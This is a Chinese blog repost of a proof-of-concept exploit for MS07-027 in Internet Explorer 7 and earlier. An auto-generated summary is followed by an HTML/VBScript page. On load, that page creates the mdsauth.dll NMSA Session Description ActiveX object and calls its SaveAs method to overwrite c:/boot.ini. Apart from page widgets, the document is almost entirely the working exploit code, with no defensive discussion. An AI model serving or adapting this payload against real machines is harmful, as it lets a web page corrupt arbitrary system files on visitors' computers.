MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)

本文提供了一个针对MS07-027漏洞的Proof of Concept (PoC) 实例,展示了如何利用该漏洞进行任意文件修改。通过一段具体的HTML和VBScript代码,演示了攻击者如何利用mdsauth.dll组件中的NMSASessionDescriptionObject SaveAs方法来篡改系统关键文件,例如boot.ini。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CODE:

 

<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>

<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">

</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://www.514.es"
target.SaveAs "c:/boot.ini"
</script>

</body>
</html>
 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值